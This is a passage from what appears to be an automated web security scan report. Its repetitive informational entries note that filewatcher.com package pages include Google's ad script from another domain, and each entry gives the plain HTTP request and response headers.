<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub.2.0.5.shar - FTP Mirror Sear
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1031. http://www.filewatcher.com/m/aub.85833.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub.85833.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub.85833.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:19 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QtGV5EV7XaZKOYaaxaYI0A"
Content-Length: 19472
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 768
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - FTP Mirror Search (Downloa
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1032. http://www.filewatcher.com/m/aub.tbz.18.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub.tbz.18.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub.tbz.18.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:12 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fI4m/RDL4hoeX1Hvixgl9w"
Content-Length: 22209
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 754
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub.tbz - FTP Mirror Search (Dow
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1033. http://www.filewatcher.com/m/aub.tbz.20.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub.tbz.20.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub.tbz.20.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:13 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "yyQ2NliWXNcaSh5000D3gA"
Content-Length: 23181
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 764
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub.tbz - FTP Mirror Search (Dow
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1034. http://www.filewatcher.com/m/aub.tgz.20.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /m/aub.tgz.20.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub.tgz.20.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:21 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "dU9PcoWeSO3QTEVZzkBXxg"
Content-Length: 23046
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 772
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub.tgz - FTP Mirror Search (Dow
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1035. http://www.filewatcher.com/p/aub-2.0.5-10.noarch.rpm.73595.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5-10.noarch.rpm.73595.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5-10.noarch.rpm.73595.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:05 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "0c7413gyby6K3GI+43dUow"
Content-Length: 5716
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 811
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5-10.noarch.rpm/ - Packa
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1036. http://www.filewatcher.com/p/aub-2.0.5-10.src.rpm.82336.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5-10.src.rpm.82336.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5-10.src.rpm.82336.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:06 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "m6iBXUpTBmHOzXQ2DNan1A"
Content-Length: 4216
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 810
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5-10.src.rpm/ - Package
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1037. http://www.filewatcher.com/p/aub-2.0.5.tgz.32459.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32459.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32459.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:52 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "6nVkZzMSeqvCuf6hvnc4ew"
Content-Length: 5169
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 798
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1038. http://www.filewatcher.com/p/aub-2.0.5.tgz.32461.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32461.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32461.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:00 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "MJAVOHdF2gmbuFJIxXuO+Q"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 806
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1039. http://www.filewatcher.com/p/aub-2.0.5.tgz.32462.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32462.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32462.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:03:01 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ra3tgA1WladZrxiR6LTaLw"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:03:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1040. http://www.filewatcher.com/p/aub-2.0.5.tgz.32465.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32465.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32465.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:59 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GaxK/GhYXXYHWWP1HwLhKQ"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1041. http://www.filewatcher.com/p/aub-2.0.5.tgz.32466.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32466.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32466.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:52 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QxsPGnmz4YrG1OXd4ffiNQ"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 797
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1042. http://www.filewatcher.com/p/aub-2.0.5.tgz.32467.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32467.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32467.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:51 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "l0aq4tZIH3WhupGp/A1IAQ"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 798
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1043. http://www.filewatcher.com/p/aub-2.0.5.tgz.32468.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32468.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32468.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:56 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "2NGRp1yReNwfKEbNZNHubw"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 807
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1044. http://www.filewatcher.com/p/aub-2.0.5.tgz.32470.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32470.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32470.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:56 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "0eoDk5dLiajv0dGeMmWITA"
Content-Length: 5169
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 805
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1045. http://www.filewatcher.com/p/aub-2.0.5.tgz.32471.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32471.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32471.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:53 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "CECO3T6sCRRd6uQZu7oSDg"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 805
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1046. http://www.filewatcher.com/p/aub-2.0.5.tgz.32472.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32472.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32472.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:51 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "WMIC5TihThvVGA7UtH0Xdg"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 792
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1047. http://www.filewatcher.com/p/aub-2.0.5.tgz.32473.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32473.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32473.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:50 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fRKTB5IAN3H6kzBbiiQ98Q"
Content-Length: 5169
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 798
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1048. http://www.filewatcher.com/p/aub-2.0.5.tgz.32474.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32474.htm

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /p/aub-2.0.5.tgz.32474.htm HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:55 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ba5+BfBeh8IySlAR4cKt0w"
Content-Length: 4826
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 805
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz/ - Package Browser
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1049. http://www.filewatcher.com/p/aub-2.0.5.tgz.32475.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /p/aub-2.0.5.tgz.32475.htm

